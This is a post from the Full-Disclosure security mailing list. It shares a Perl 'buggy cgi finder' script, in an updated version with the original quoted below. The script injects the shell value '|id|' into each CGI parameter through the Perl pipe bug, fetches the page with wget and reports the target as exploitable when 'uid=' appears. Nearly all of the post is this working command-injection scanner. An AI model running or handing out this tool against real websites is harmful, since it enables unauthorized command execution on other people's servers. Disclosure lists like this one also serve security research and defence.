This has a small bug. Gives false positives on some websites, silly me. Here's an updated version:
--- code --- #!/usr/bin/perl #oxagast if (@ARGV[0] eq "") { print " ---=== oxagast's buggy cgi finder ===---\n\n"; print "Please provide a URL with a CGI script and it's args.\n"; print "ex. $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\ <http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world%5C>"\n"; exit; } @urlquestionsplit = split(/\?/, @ARGV[0]); $baseurl = @urlquestionsplit[0]; @inputafterquestion = split(/\&/, @urlquestionsplit[1]); for $countargs (0..scalar(@inputafterquestion)) { $numofargs = $countargs; } for $cgiargsplitter (0..$numofargs) { @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]); push @cgiargsaftereq, @cgiaanda[1]; } for $thisarg (0..$numofargs-1) { $wholestring = @urlquestionsplit[1]; $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/; push @urltotest, "$baseurl?$wholestring"; } for $argnumber (0..$numofargs) { system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh"); system("chmod u+x getfile.sh"); system("./getfile.sh"); @gotstuff = `cat gettmp`; $done = 0; $exploitable; for $line (0..scalar(@gotstuff)-1) { if (@gotstuff[$line] =~ m/uid\=/) { if ($done == 0) { $done = 1; $firstline = $line; @gotstuff[$line] =~ m/.*uid(.*)\).*/; $uidline = "uid$1)"; print "Exploitable...\n"; print "@urltotest[$argnumber]\n"; print "$uidline\n"; unlink(gettemp); unlink(getfile.sh); $exploitable = 1; } } } system("rm gettmp getfile.sh"); } if ($exploitable == 0) { print "Sorry, not exploitable...\n"; } --- code --- On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker < marshallwhitta...@gmail.com> wrote: > This works on the perl pipe bug. It'll take an arg that's the address of a > website and it's cgi script with some args to the script then figure out if > it can exploit it and how. It's worked on everything I've tried it on, > though I have limited test boxes. It's pretty dirty but it works. > > #!/usr/bin/perl > > #oxagast > > if (@ARGV[0] eq "") { > print " ---=== oxagast's buggy cgi finder ===---\n\n"; > print "Please provide a URL with a CGI script and it's args.\n"; > print "ex. $0 > \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\ > > <http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world%5C>"\n"; > exit; > } > > > @urlquestionsplit = split(/\?/, @ARGV[0]); > $baseurl = @urlquestionsplit[0]; > @inputafterquestion = split(/\&/, @urlquestionsplit[1]); > > for $countargs (0..scalar(@inputafterquestion)) { > $numofargs = $countargs; > } > > > for $cgiargsplitter (0..$numofargs) { > @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]); > push @cgiargsaftereq, @cgiaanda[1]; > } > for $thisarg (0..$numofargs-1) { > $wholestring = @urlquestionsplit[1]; > $wholestring =~ s/@cgiargsaftereq[$thisarg]/\|id|/; > push @urltotest, "$baseurl?$wholestring"; > } > > > for $argnumber (0..$numofargs) { > system("echo \"wget -q -O gettmp \'@urltotest[$argnumber]\'\" > getfile.sh"); > system("chmod u+x getfile.sh"); > system("./getfile.sh"); > @gotstuff = `cat gettmp`; > $done = 0; > $exploitable; > for $line (0..scalar(@gotstuff)-1) { > if (@gotstuff[$line] =~ m/uid/) { > if ($done == 0) { > $done = 1; > $firstline = $line; > @gotstuff[$line] =~ m/.*uid(.*)\).*/; > $uidline = "uid$1)"; > print "Exploitable...\n"; > print "@urltotest[$argnumber]\n"; > print "$uidline\n"; > unlink(gettemp); > unlink(getfile.sh); > $exploitable = 1; > } > } > } > system("rm gettmp getfile.sh"); > } > if ($exploitable == 0) { > print "Sorry, not exploitable...\n"; > } > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/